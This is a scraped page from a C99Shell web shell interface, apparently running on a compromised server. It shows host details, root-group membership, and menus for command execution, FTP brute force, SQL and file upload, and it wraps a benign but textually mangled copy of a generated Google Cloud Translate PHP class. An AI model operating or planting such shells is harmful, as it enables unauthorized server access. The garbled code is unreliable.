!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.qr.picotech.app/public_html/vendor/google/cloud-translate/src/V3/   drwxr-xr-x
Free 29.19 GB of 117.98 GB (24.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BatchTranslateDocumentRequest.php (27.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: google/cloud/translate/v3/translation_service.proto

namespace Google\Cloud\Translate\V3;

use 
Google\Protobuf\Internal\GPBType;
use 
Google\Protobuf\Internal\RepeatedField;
use 
Google\Protobuf\Internal\GPBUtil;

/**
 * The BatchTranslateDocument request.
 *
 * Generated from protobuf message <code>google.cloud.translation.v3.BatchTranslateDocumentRequest</code>
 */
class BatchTranslateDocumentRequest extends \Google\Protobuf\Internal\Message
{
    
/**
     * Required. Location to make a regional call.
     * Format: `projects/{project-number-or-id}/locations/{location-id}`.
     * The `global` location is not supported for batch translation.
     * Only AutoML Translation models or glossaries within the same region (have
     * the same location-id) can be used, otherwise an INVALID_ARGUMENT (400)
     * error is returned.
     *
     * Generated from protobuf field <code>string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = {</code>
     */
    
private $parent '';
    
/**
     * Required. The ISO-639 language code of the input document if known, for
     * example, "en-US" or "sr-Latn". Supported language codes are listed in
     * [Language Support](https://cloud.google.com/translate/docs/languages).
     *
     * Generated from protobuf field <code>string source_language_code = 2 [(.google.api.field_behavior) = REQUIRED];</code>
     */
    
private $source_language_code '';
    
/**
     * Required. The ISO-639 language code to use for translation of the input
     * document. Specify up to 10 language codes here.
     *
     * Generated from protobuf field <code>repeated string target_language_codes = 3 [(.google.api.field_behavior) = REQUIRED];</code>
     */
    
private $target_language_codes;
    
/**
     * Required. Input configurations.
     * The total number of files matched should be <= 100.
     * The total content size to translate should be <= 100M Unicode codepoints.
     * The files must use UTF-8 encoding.
     *
     * Generated from protobuf field <code>repeated .google.cloud.translation.v3.BatchDocumentInputConfig input_configs = 4 [(.google.api.field_behavior) = REQUIRED];</code>
     */
    
private $input_configs;
    
/**
     * Required. Output configuration.
     * If 2 input configs match to the same file (that is, same input path),
     * we don't generate output for duplicate inputs.
     *
     * Generated from protobuf field <code>.google.cloud.translation.v3.BatchDocumentOutputConfig output_config = 5 [(.google.api.field_behavior) = REQUIRED];</code>
     */
    
private $output_config null;
    
/**
     * Optional. The models to use for translation. Map's key is target language
     * code. Map's value is the model name. Value can be a built-in general model,
     * or an AutoML Translation model.
     * The value format depends on model type:
     * - AutoML Translation models:
     *   `projects/{project-number-or-id}/locations/{location-id}/models/{model-id}`
     * - General (built-in) models:
     *   `projects/{project-number-or-id}/locations/{location-id}/models/general/nmt`,
     * If the map is empty or a specific model is
     * not requested for a language pair, then default google model (nmt) is used.
     *
     * Generated from protobuf field <code>map<string, string> models = 6 [(.google.api.field_behavior) = OPTIONAL];</code>
     */
    
private $models;
    
/**
     * Optional. Glossaries to be applied. It's keyed by target language code.
     *
     * Generated from protobuf field <code>map<string, .google.cloud.translation.v3.TranslateTextGlossaryConfig> glossaries = 7 [(.google.api.field_behavior) = OPTIONAL];</code>
     */
    
private $glossaries;
    
/**
     * Optional. The file format conversion map that is applied to all input
     * files. The map key is the original mime_type. The map value is the target
     * mime_type of translated documents.
     * Supported file format conversion includes:
     * - `application/pdf` to
     *   `application/vnd.openxmlformats-officedocument.wordprocessingml.document`
     * If nothing specified, output files will be in the same format as the
     * original file.
     *
     * Generated from protobuf field <code>map<string, string> format_conversions = 8 [(.google.api.field_behavior) = OPTIONAL];</code>
     */
    
private $format_conversions;
    
/**
     * Optional. This flag is to support user customized attribution.
     * If not provided, the default is `Machine Translated by Google`.
     * Customized attribution should follow rules in
     * https://cloud.google.com/translate/attribution#attribution_and_logos
     *
     * Generated from protobuf field <code>string customized_attribution = 10 [(.google.api.field_behavior) = OPTIONAL];</code>
     */
    
private $customized_attribution '';
    
/**
     * Optional. If true, use the text removal server to remove the shadow text on
     * background image for native pdf translation.
     * Shadow removal feature can only be enabled when
     * is_translate_native_pdf_only: false && pdf_native_only: false
     *
     * Generated from protobuf field <code>bool enable_shadow_removal_native_pdf = 11 [(.google.api.field_behavior) = OPTIONAL];</code>
     */
    
private $enable_shadow_removal_native_pdf false;
    
/**
     * Optional. If true, enable auto rotation correction in DVS.
     *
     * Generated from protobuf field <code>bool enable_rotation_correction = 12 [(.google.api.field_behavior) = OPTIONAL];</code>
     */
    
private $enable_rotation_correction false;

    
/**
     * @param string                                                $parent              Required. Location to make a regional call.
     *
     *                                                                                   Format: `projects/{project-number-or-id}/locations/{location-id}`.
     *
     *                                                                                   The `global` location is not supported for batch translation.
     *
     *                                                                                   Only AutoML Translation models or glossaries within the same region (have
     *                                                                                   the same location-id) can be used, otherwise an INVALID_ARGUMENT (400)
     *                                                                                   error is returned. Please see
     *                                                                                   {@see TranslationServiceClient::locationName()} for help formatting this field.
     * @param string                                                $sourceLanguageCode  Required. The ISO-639 language code of the input document if known, for
     *                                                                                   example, "en-US" or "sr-Latn". Supported language codes are listed in
     *                                                                                   [Language Support](https://cloud.google.com/translate/docs/languages).
     * @param string[]                                              $targetLanguageCodes Required. The ISO-639 language code to use for translation of the input
     *                                                                                   document. Specify up to 10 language codes here.
     * @param \Google\Cloud\Translate\V3\BatchDocumentInputConfig[] $inputConfigs        Required. Input configurations.
     *                                                                                   The total number of files matched should be <= 100.
     *                                                                                   The total content size to translate should be <= 100M Unicode codepoints.
     *                                                                                   The files must use UTF-8 encoding.
     * @param \Google\Cloud\Translate\V3\BatchDocumentOutputConfig  $outputConfig        Required. Output configuration.
     *                                                                                   If 2 input configs match to the same file (that is, same input path),
     *                                                                                   we don't generate output for duplicate inputs.
     *
     * @return \Google\Cloud\Translate\V3\BatchTranslateDocumentRequest
     *
     * @experimental
     */
    
public static function build(string $parentstring $sourceLanguageCode, array $targetLanguageCodes, array $inputConfigs\Google\Cloud\Translate\V3\BatchDocumentOutputConfig $outputConfig): self
    
{
        return (new 
self())
            ->
setParent($parent)
            ->
setSourceLanguageCode($sourceLanguageCode)
            ->
setTargetLanguageCodes($targetLanguageCodes)
            ->
setInputConfigs($inputConfigs)
            ->
setOutputConfig($outputConfig);
    }

    
/**
     * Constructor.
     *
     * @param array $data {
     *     Optional. Data for populating the Message object.
     *
     *     @type string $parent
     *           Required. Location to make a regional call.
     *           Format: `projects/{project-number-or-id}/locations/{location-id}`.
     *           The `global` location is not supported for batch translation.
     *           Only AutoML Translation models or glossaries within the same region (have
     *           the same location-id) can be used, otherwise an INVALID_ARGUMENT (400)
     *           error is returned.
     *     @type string $source_language_code
     *           Required. The ISO-639 language code of the input document if known, for
     *           example, "en-US" or "sr-Latn". Supported language codes are listed in
     *           [Language Support](https://cloud.google.com/translate/docs/languages).
     *     @type array<string>|\Google\Protobuf\Internal\RepeatedField $target_language_codes
     *           Required. The ISO-639 language code to use for translation of the input
     *           document. Specify up to 10 language codes here.
     *     @type array<\Google\Cloud\Translate\V3\BatchDocumentInputConfig>|\Google\Protobuf\Internal\RepeatedField $input_configs
     *           Required. Input configurations.
     *           The total number of files matched should be <= 100.
     *           The total content size to translate should be <= 100M Unicode codepoints.
     *           The files must use UTF-8 encoding.
     *     @type \Google\Cloud\Translate\V3\BatchDocumentOutputConfig $output_config
     *           Required. Output configuration.
     *           If 2 input configs match to the same file (that is, same input path),
     *           we don't generate output for duplicate inputs.
     *     @type array|\Google\Protobuf\Internal\MapField $models
     *           Optional. The models to use for translation. Map's key is target language
     *           code. Map's value is the model name. Value can be a built-in general model,
     *           or an AutoML Translation model.
     *           The value format depends on model type:
     *           - AutoML Translation models:
     *             `projects/{project-number-or-id}/locations/{location-id}/models/{model-id}`
     *           - General (built-in) models:
     *             `projects/{project-number-or-id}/locations/{location-id}/models/general/nmt`,
     *           If the map is empty or a specific model is
     *           not requested for a language pair, then default google model (nmt) is used.
     *     @type array|\Google\Protobuf\Internal\MapField $glossaries
     *           Optional. Glossaries to be applied. It's keyed by target language code.
     *     @type array|\Google\Protobuf\Internal\MapField $format_conversions
     *           Optional. The file format conversion map that is applied to all input
     *           files. The map key is the original mime_type. The map value is the target
     *           mime_type of translated documents.
     *           Supported file format conversion includes:
     *           - `application/pdf` to
     *             `application/vnd.openxmlformats-officedocument.wordprocessingml.document`
     *           If nothing specified, output files will be in the same format as the
     *           original file.
     *     @type string $customized_attribution
     *           Optional. This flag is to support user customized attribution.
     *           If not provided, the default is `Machine Translated by Google`.
     *           Customized attribution should follow rules in
     *           https://cloud.google.com/translate/attribution#attribution_and_logos
     *     @type bool $enable_shadow_removal_native_pdf
     *           Optional. If true, use the text removal server to remove the shadow text on
     *           background image for native pdf translation.
     *           Shadow removal feature can only be enabled when
     *           is_translate_native_pdf_only: false && pdf_native_only: false
     *     @type bool $enable_rotation_correction
     *           Optional. If true, enable auto rotation correction in DVS.
     * }
     */
    
public function __construct($data NULL) {
        
\GPBMetadata\Google\Cloud\Translate\V3\TranslationService::initOnce();
        
parent::__construct($data);
    }

    
/**
     * Required. Location to make a regional call.
     * Format: `projects/{project-number-or-id}/locations/{location-id}`.
     * The `global` location is not supported for batch translation.
     * Only AutoML Translation models or glossaries within the same region (have
     * the same location-id) can be used, otherwise an INVALID_ARGUMENT (400)
     * error is returned.
     *
     * Generated from protobuf field <code>string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = {</code>
     * @return string
     */
    
public function getParent()
    {
        return 
$this->parent;
    }

    
/**
     * Required. Location to make a regional call.
     * Format: `projects/{project-number-or-id}/locations/{location-id}`.
     * The `global` location is not supported for batch translation.
     * Only AutoML Translation models or glossaries within the same region (have
     * the same location-id) can be used, otherwise an INVALID_ARGUMENT (400)
     * error is returned.
     *
     * Generated from protobuf field <code>string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = {</code>
     * @param string $var
     * @return $this
     */
    
public function setParent($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->parent $var;

        return 
$this;
    }

    
/**
     * Required. The ISO-639 language code of the input document if known, for
     * example, "en-US" or "sr-Latn". Supported language codes are listed in
     * [Language Support](https://cloud.google.com/translate/docs/languages).
     *
     * Generated from protobuf field <code>string source_language_code = 2 [(.google.api.field_behavior) = REQUIRED];</code>
     * @return string
     */
    
public function getSourceLanguageCode()
    {
        return 
$this->source_language_code;
    }

    
/**
     * Required. The ISO-639 language code of the input document if known, for
     * example, "en-US" or "sr-Latn". Supported language codes are listed in
     * [Language Support](https://cloud.google.com/translate/docs/languages).
     *
     * Generated from protobuf field <code>string source_language_code = 2 [(.google.api.field_behavior) = REQUIRED];</code>
     * @param string $var
     * @return $this
     */
    
public function setSourceLanguageCode($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->source_language_code $var;

        return 
$this;
    }

    
/**
     * Required. The ISO-639 language code to use for translation of the input
     * document. Specify up to 10 language codes here.
     *
     * Generated from protobuf field <code>repeated string target_language_codes = 3 [(.google.api.field_behavior) = REQUIRED];</code>
     * @return \Google\Protobuf\Internal\RepeatedField
     */
    
public function getTargetLanguageCodes()
    {
        return 
$this->target_language_codes;
    }

    
/**
     * Required. The ISO-639 language code to use for translation of the input
     * document. Specify up to 10 language codes here.
     *
     * Generated from protobuf field <code>repeated string target_language_codes = 3 [(.google.api.field_behavior) = REQUIRED];</code>
     * @param array<string>|\Google\Protobuf\Internal\RepeatedField $var
     * @return $this
     */
    
public function setTargetLanguageCodes($var)
    {
        
$arr GPBUtil::checkRepeatedField($var\Google\Protobuf\Internal\GPBType::STRING);
        
$this->target_language_codes $arr;

        return 
$this;
    }

    
/**
     * Required. Input configurations.
     * The total number of files matched should be <= 100.
     * The total content size to translate should be <= 100M Unicode codepoints.
     * The files must use UTF-8 encoding.
     *
     * Generated from protobuf field <code>repeated .google.cloud.translation.v3.BatchDocumentInputConfig input_configs = 4 [(.google.api.field_behavior) = REQUIRED];</code>
     * @return \Google\Protobuf\Internal\RepeatedField
     */
    
public function getInputConfigs()
    {
        return 
$this->input_configs;
    }

    
/**
     * Required. Input configurations.
     * The total number of files matched should be <= 100.
     * The total content size to translate should be <= 100M Unicode codepoints.
     * The files must use UTF-8 encoding.
     *
     * Generated from protobuf field <code>repeated .google.cloud.translation.v3.BatchDocumentInputConfig input_configs = 4 [(.google.api.field_behavior) = REQUIRED];</code>
     * @param array<\Google\Cloud\Translate\V3\BatchDocumentInputConfig>|\Google\Protobuf\Internal\RepeatedField $var
     * @return $this
     */
    
public function setInputConfigs($var)
    {
        
$arr GPBUtil::checkRepeatedField($var\Google\Protobuf\Internal\GPBType::MESSAGE\Google\Cloud\Translate\V3\BatchDocumentInputConfig::class);
        
$this->input_configs $arr;

        return 
$this;
    }

    
/**
     * Required. Output configuration.
     * If 2 input configs match to the same file (that is, same input path),
     * we don't generate output for duplicate inputs.
     *
     * Generated from protobuf field <code>.google.cloud.translation.v3.BatchDocumentOutputConfig output_config = 5 [(.google.api.field_behavior) = REQUIRED];</code>
     * @return \Google\Cloud\Translate\V3\BatchDocumentOutputConfig|null
     */
    
public function getOutputConfig()
    {
        return 
$this->output_config;
    }

    public function 
hasOutputConfig()
    {
        return isset(
$this->output_config);
    }

    public function 
clearOutputConfig()
    {
        unset(
$this->output_config);
    }

    
/**
     * Required. Output configuration.
     * If 2 input configs match to the same file (that is, same input path),
     * we don't generate output for duplicate inputs.
     *
     * Generated from protobuf field <code>.google.cloud.translation.v3.BatchDocumentOutputConfig output_config = 5 [(.google.api.field_behavior) = REQUIRED];</code>
     * @param \Google\Cloud\Translate\V3\BatchDocumentOutputConfig $var
     * @return $this
     */
    
public function setOutputConfig($var)
    {
        
GPBUtil::checkMessage($var\Google\Cloud\Translate\V3\BatchDocumentOutputConfig::class);
        
$this->output_config $var;

        return 
$this;
    }

    
/**
     * Optional. The models to use for translation. Map's key is target language
     * code. Map's value is the model name. Value can be a built-in general model,
     * or an AutoML Translation model.
     * The value format depends on model type:
     * - AutoML Translation models:
     *   `projects/{project-number-or-id}/locations/{location-id}/models/{model-id}`
     * - General (built-in) models:
     *   `projects/{project-number-or-id}/locations/{location-id}/models/general/nmt`,
     * If the map is empty or a specific model is
     * not requested for a language pair, then default google model (nmt) is used.
     *
     * Generated from protobuf field <code>map<string, string> models = 6 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @return \Google\Protobuf\Internal\MapField
     */
    
public function getModels()
    {
        return 
$this->models;
    }

    
/**
     * Optional. The models to use for translation. Map's key is target language
     * code. Map's value is the model name. Value can be a built-in general model,
     * or an AutoML Translation model.
     * The value format depends on model type:
     * - AutoML Translation models:
     *   `projects/{project-number-or-id}/locations/{location-id}/models/{model-id}`
     * - General (built-in) models:
     *   `projects/{project-number-or-id}/locations/{location-id}/models/general/nmt`,
     * If the map is empty or a specific model is
     * not requested for a language pair, then default google model (nmt) is used.
     *
     * Generated from protobuf field <code>map<string, string> models = 6 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @param array|\Google\Protobuf\Internal\MapField $var
     * @return $this
     */
    
public function setModels($var)
    {
        
$arr GPBUtil::checkMapField($var\Google\Protobuf\Internal\GPBType::STRING\Google\Protobuf\Internal\GPBType::STRING);
        
$this->models $arr;

        return 
$this;
    }

    
/**
     * Optional. Glossaries to be applied. It's keyed by target language code.
     *
     * Generated from protobuf field <code>map<string, .google.cloud.translation.v3.TranslateTextGlossaryConfig> glossaries = 7 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @return \Google\Protobuf\Internal\MapField
     */
    
public function getGlossaries()
    {
        return 
$this->glossaries;
    }

    
/**
     * Optional. Glossaries to be applied. It's keyed by target language code.
     *
     * Generated from protobuf field <code>map<string, .google.cloud.translation.v3.TranslateTextGlossaryConfig> glossaries = 7 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @param array|\Google\Protobuf\Internal\MapField $var
     * @return $this
     */
    
public function setGlossaries($var)
    {
        
$arr GPBUtil::checkMapField($var\Google\Protobuf\Internal\GPBType::STRING\Google\Protobuf\Internal\GPBType::MESSAGE\Google\Cloud\Translate\V3\TranslateTextGlossaryConfig::class);
        
$this->glossaries $arr;

        return 
$this;
    }

    
/**
     * Optional. The file format conversion map that is applied to all input
     * files. The map key is the original mime_type. The map value is the target
     * mime_type of translated documents.
     * Supported file format conversion includes:
     * - `application/pdf` to
     *   `application/vnd.openxmlformats-officedocument.wordprocessingml.document`
     * If nothing specified, output files will be in the same format as the
     * original file.
     *
     * Generated from protobuf field <code>map<string, string> format_conversions = 8 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @return \Google\Protobuf\Internal\MapField
     */
    
public function getFormatConversions()
    {
        return 
$this->format_conversions;
    }

    
/**
     * Optional. The file format conversion map that is applied to all input
     * files. The map key is the original mime_type. The map value is the target
     * mime_type of translated documents.
     * Supported file format conversion includes:
     * - `application/pdf` to
     *   `application/vnd.openxmlformats-officedocument.wordprocessingml.document`
     * If nothing specified, output files will be in the same format as the
     * original file.
     *
     * Generated from protobuf field <code>map<string, string> format_conversions = 8 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @param array|\Google\Protobuf\Internal\MapField $var
     * @return $this
     */
    
public function setFormatConversions($var)
    {
        
$arr GPBUtil::checkMapField($var\Google\Protobuf\Internal\GPBType::STRING\Google\Protobuf\Internal\GPBType::STRING);
        
$this->format_conversions $arr;

        return 
$this;
    }

    
/**
     * Optional. This flag is to support user customized attribution.
     * If not provided, the default is `Machine Translated by Google`.
     * Customized attribution should follow rules in
     * https://cloud.google.com/translate/attribution#attribution_and_logos
     *
     * Generated from protobuf field <code>string customized_attribution = 10 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @return string
     */
    
public function getCustomizedAttribution()
    {
        return 
$this->customized_attribution;
    }

    
/**
     * Optional. This flag is to support user customized attribution.
     * If not provided, the default is `Machine Translated by Google`.
     * Customized attribution should follow rules in
     * https://cloud.google.com/translate/attribution#attribution_and_logos
     *
     * Generated from protobuf field <code>string customized_attribution = 10 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @param string $var
     * @return $this
     */
    
public function setCustomizedAttribution($var)
    {
        
GPBUtil::checkString($varTrue);
        
$this->customized_attribution $var;

        return 
$this;
    }

    
/**
     * Optional. If true, use the text removal server to remove the shadow text on
     * background image for native pdf translation.
     * Shadow removal feature can only be enabled when
     * is_translate_native_pdf_only: false && pdf_native_only: false
     *
     * Generated from protobuf field <code>bool enable_shadow_removal_native_pdf = 11 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @return bool
     */
    
public function getEnableShadowRemovalNativePdf()
    {
        return 
$this->enable_shadow_removal_native_pdf;
    }

    
/**
     * Optional. If true, use the text removal server to remove the shadow text on
     * background image for native pdf translation.
     * Shadow removal feature can only be enabled when
     * is_translate_native_pdf_only: false && pdf_native_only: false
     *
     * Generated from protobuf field <code>bool enable_shadow_removal_native_pdf = 11 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @param bool $var
     * @return $this
     */
    
public function setEnableShadowRemovalNativePdf($var)
    {
        
GPBUtil::checkBool($var);
        
$this->enable_shadow_removal_native_pdf $var;

        return 
$this;
    }

    
/**
     * Optional. If true, enable auto rotation correction in DVS.
     *
     * Generated from protobuf field <code>bool enable_rotation_correction = 12 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @return bool
     */
    
public function getEnableRotationCorrection()
    {
        return 
$this->enable_rotation_correction;
    }

    
/**
     * Optional. If true, enable auto rotation correction in DVS.
     *
     * Generated from protobuf field <code>bool enable_rotation_correction = 12 [(.google.api.field_behavior) = OPTIONAL];</code>
     * @param bool $var
     * @return $this
     */
    
public function setEnableRotationCorrection($var)
    {
        
GPBUtil::checkBool($var);
        
$this->enable_rotation_correction $var;

        return 
$this;
    }

}


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--